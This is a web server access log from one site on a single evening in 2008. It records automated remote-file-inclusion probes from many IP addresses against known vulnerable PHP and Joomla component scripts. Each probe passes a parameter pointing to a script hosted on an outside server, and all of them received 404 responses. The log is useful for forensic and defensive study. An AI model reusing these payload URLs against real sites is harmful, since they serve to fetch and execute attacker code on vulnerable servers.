78.108.81.151 - - [04/May/2008:18:15:59 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
207.144.153.91 - - [04/May/2008:18:16:14 -0700] "GET /logs/access_080113.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4" "www.galf.org"
80.71.36.82 - - [04/May/2008:18:16:31 -0700] "GET //%3Cwbr%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.216.94.10 - - [04/May/2008:18:17:08 -0700] "GET /logs/access_071231.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.galf.org"
66.232.156.130 - - [04/May/2008:18:17:12 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
205.234.130.198 - - [04/May/2008:18:17:44 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
205.234.130.198 - - [04/May/2008:18:17:44 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
200.160.251.134 - - [04/May/2008:18:17:47 -0700] "GET /logs/access.log/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.130.198 - - [04/May/2008:18:17:49 -0700] "GET /logs/access_080225.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
200.160.251.134 - - [04/May/2008:18:17:50 -0700] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.160.251.134 - - [04/May/2008:18:17:51 -0700] "GET /logs/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
196.38.88.68 - - [04/May/2008:18:18:39 -0700] "GET /logs/access_071203.log/index.php?pag=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
196.38.88.68 - - [04/May/2008:18:18:39 -0700] "GET /index.php?pag=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
196.38.88.68 - - [04/May/2008:18:18:40 -0700] "GET /logs/index.php?pag=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.16.18 - - [04/May/2008:18:18:52 -0700] "GET /logs/access_071203.log/index.php?pag=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.16.18 - - [04/May/2008:18:18:52 -0700] "GET /index.php?pag=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.16.18 - - [04/May/2008:18:18:53 -0700] "GET /logs/index.php?pag=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.232.156.130 - - [04/May/2008:18:19:13 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
59.106.19.213 - - [04/May/2008:18:19:29 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
59.106.19.213 - - [04/May/2008:18:20:34 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.16.18 - - [04/May/2008:18:21:52 -0700] "GET /logs/access_071231.log/index.php?pag=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.54.9.218 - - [04/May/2008:18:24:05 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.32.68.172 - - [04/May/2008:18:24:38 -0700] "GET /logs/access.log/main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:18:24:38 -0700] "GET /main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:18:24:38 -0700] "GET /logs/main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:18:25:05 -0700] "GET /logs/access.log/main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:18:25:05 -0700] "GET /main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:18:25:05 -0700] "GET /logs/main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
196.38.88.68 - - [04/May/2008:18:25:10 -0700] "GET /logs/access_071231.log/index.php?pag=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.71.36.82 - - [04/May/2008:18:25:18 -0700] "GET /logs//%3Cwbr%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.71.36.82 - - [04/May/2008:18:25:18 -0700] "GET //%3Cwbr%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.130.198 - - [04/May/2008:18:25:32 -0700] "GET /co.uk/index.php?site=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.15.205.17 - - [04/May/2008:18:26:01 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
80.71.36.82 - - [04/May/2008:18:27:04 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.32.68.172 - - [04/May/2008:18:27:05 -0700] "GET /logs/access_071105.log/main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.144.153.9 - - [04/May/2008:18:27:28 -0700] "GET /logs/access_071008.log/index.php?inc=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.144.153.9 - - [04/May/2008:18:27:28 -0700] "GET /index.php?inc=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.144.153.9 - - [04/May/2008:18:27:34 -0700] "GET /logs/index.php?inc=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.6.180.69 - - [04/May/2008:18:27:39 -0700] "GET /logs/access_071105.log/main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.71.36.82 - - [04/May/2008:18:27:46 -0700] "GET /logs/access_080407.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.71.36.82 - - [04/May/2008:18:27:46 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.71.36.82 - - [04/May/2008:18:27:46 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.108.81.151 - - [04/May/2008:18:28:09 -0700] "GET /logs/access_071008.log//index.php3?aide=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.108.81.151 - - [04/May/2008:18:28:09 -0700] "GET /logs/access_071231.log//index.php3?aide=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.23.237.236 - - [04/May/2008:18:28:34 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.23.237.236 - - [04/May/2008:18:28:35 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.23.237.236 - - [04/May/2008:18:28:36 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.12.151.34 - - [04/May/2008:18:28:36 -0700] "GET /logs/access_080121.log/scanhttp://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
201.12.151.34 - - [04/May/2008:18:28:40 -0700] "GET /scanhttp://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
201.12.151.34 - - [04/May/2008:18:28:43 -0700] "GET /logs/scanhttp://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.232.156.130 - - [04/May/2008:18:29:07 -0700] "GET //Neos_Chronos/header.php?base_folder=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
196.38.88.68 - - [04/May/2008:18:29:30 -0700] "GET /logs/access_071105.log/index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
196.38.88.68 - - [04/May/2008:18:29:31 -0700] "GET /index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
196.38.88.68 - - [04/May/2008:18:29:31 -0700] "GET /logs/index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
59.106.19.213 - - [04/May/2008:18:30:24 -0700] "GET /logs/access_071008.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.19.213 - - [04/May/2008:18:30:25 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.19.213 - - [04/May/2008:18:30:25 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.146.251.123 - - [04/May/2008:18:30:27 -0700] "GET /logs/access_071203.log/index.php?pag=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.146.251.123 - - [04/May/2008:18:30:28 -0700] "GET /index.php?pag=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.146.251.123 - - [04/May/2008:18:30:29 -0700] "GET /logs/index.php?pag=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.23.237.236 - - [04/May/2008:18:30:42 -0700] "GET /logs/access_071001.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.232.156.130 - - [04/May/2008:18:30:45 -0700] "GET /logs/access_080317.log//Neos_Chronos/header.php?base_folder=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.232.156.130 - - [04/May/2008:18:30:45 -0700] "GET //Neos_Chronos/header.php?base_folder=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.232.156.130 - - [04/May/2008:18:30:45 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
196.38.88.68 - - [04/May/2008:18:30:59 -0700] "GET /logs/access_070826.log/index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.23.237.236 - - [04/May/2008:18:31:04 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.232.156.130 - - [04/May/2008:18:31:04 -0700] "GET /logs/access_080204.log//Neos_Chronos/header.php?base_folder=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
59.106.19.213 - - [04/May/2008:18:31:20 -0700] "GET /logs/access_070924.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.107.122 - - [04/May/2008:18:32:05 -0700] "GET /logs/access_080310.log/index.php?o=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.107.122 - - [04/May/2008:18:32:05 -0700] "GET /index.php?o=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.107.122 - - [04/May/2008:18:32:05 -0700] "GET /logs/index.php?o=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.146.251.123 - - [04/May/2008:18:32:10 -0700] "GET /logs/access_071105.log/index1.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.146.251.123 - - [04/May/2008:18:32:11 -0700] "GET /index1.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.146.251.123 - - [04/May/2008:18:32:11 -0700] "GET /logs/index1.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.54.9.218 - - [04/May/2008:18:33:22 -0700] "GET /logs/access_080317.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.54.9.218 - - [04/May/2008:18:33:22 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.54.9.218 - - [04/May/2008:18:33:23 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.16.18 - - [04/May/2008:18:33:42 -0700] "GET /index1.php?page=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
203.146.251.123 - - [04/May/2008:18:33:45 -0700] "GET /logs/access_070826.log/index1.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.94.128.57 - - [04/May/2008:18:35:01 -0700] "GET /index1.php?p=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
205.234.130.198 - - [04/May/2008:18:35:05 -0700] "GET /logs/co.uk/index.php?site=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
211.233.89.217 - - [04/May/2008:18:35:12 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.233.89.217 - - [04/May/2008:18:35:13 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.233.89.217 - - [04/May/2008:18:35:13 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.130.198 - - [04/May/2008:18:35:29 -0700] "GET /logs/access.log/co.uk/index.php?site=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
203.146.251.123 - - [04/May/2008:18:36:20 -0700] "GET /logs/access_071231.log/index.php?pag=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.106.16.18 - - [04/May/2008:18:36:36 -0700] "GET /index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.15.205.17 - - [04/May/2008:18:37:11 -0700] "GET /logs/access_080407.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.15.205.17 - - [04/May/2008:18:37:11 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
207.58.131.61 - - [04/May/2008:18:37:19 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
207.58.131.61 - - [04/May/2008:18:37:19 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
200.160.251.134 - - [04/May/2008:18:39:11 -0700] "GET /logs/access_080414.log/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.16.18 - - [04/May/2008:18:39:19 -0700] "GET /logs/access_071105.log/index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.16.18 - - [04/May/2008:18:39:20 -0700] "GET /logs/index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
79.2.166.113 - - [04/May/2008:18:39:42 -0700] "GET /logs/access_080331.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://193.200.193.236/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
79.2.166.113 - - [04/May/2008:18:39:42 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://193.200.193.236/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
79.2.166.113 - - [04/May/2008:18:39:43 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://193.200.193.236/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.61.37.254 - - [04/May/2008:18:39:44 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.59.151.227 - - [04/May/2008:18:39:44 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.61.37.254 - - [04/May/2008:18:39:44 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.59.151.227 - - [04/May/2008:18:39:44 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.151.227 - - [04/May/2008:18:39:44 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.61.37.254 - - [04/May/2008:18:39:44 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
69.61.37.254 - - [04/May/2008:18:39:44 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
69.61.37.254 - - [04/May/2008:18:39:44 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.59.151.227 - - [04/May/2008:18:39:45 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.61.37.254 - - [04/May/2008:18:39:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.59.151.227 - - [04/May/2008:18:39:45 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.151.227 - - [04/May/2008:18:39:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.112.43.2 - - [04/May/2008:18:39:45 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.112.43.2 - - [04/May/2008:18:39:46 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.112.43.2 - - [04/May/2008:18:39:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.32.68.172 - - [04/May/2008:18:39:58 -0700] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:18:39:58 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:18:39:58 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
91.121.101.163 - - [04/May/2008:18:40:25 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.101.163 - - [04/May/2008:18:40:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.36.179.98 - - [04/May/2008:18:40:28 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.36.179.98 - - [04/May/2008:18:40:28 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.36.179.98 - - [04/May/2008:18:40:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.36.179.98 - - [04/May/2008:18:40:34 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.36.179.98 - - [04/May/2008:18:40:34 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.36.179.98 - - [04/May/2008:18:40:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
208.112.43.2 - - [04/May/2008:18:40:43 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.6.180.69 - - [04/May/2008:18:40:45 -0700] "GET /logs/access_071203.log//modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:18:40:45 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:18:40:45 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:18:40:47 -0700] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.16.18 - - [04/May/2008:18:40:49 -0700] "GET /logs/access_070826.log/index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
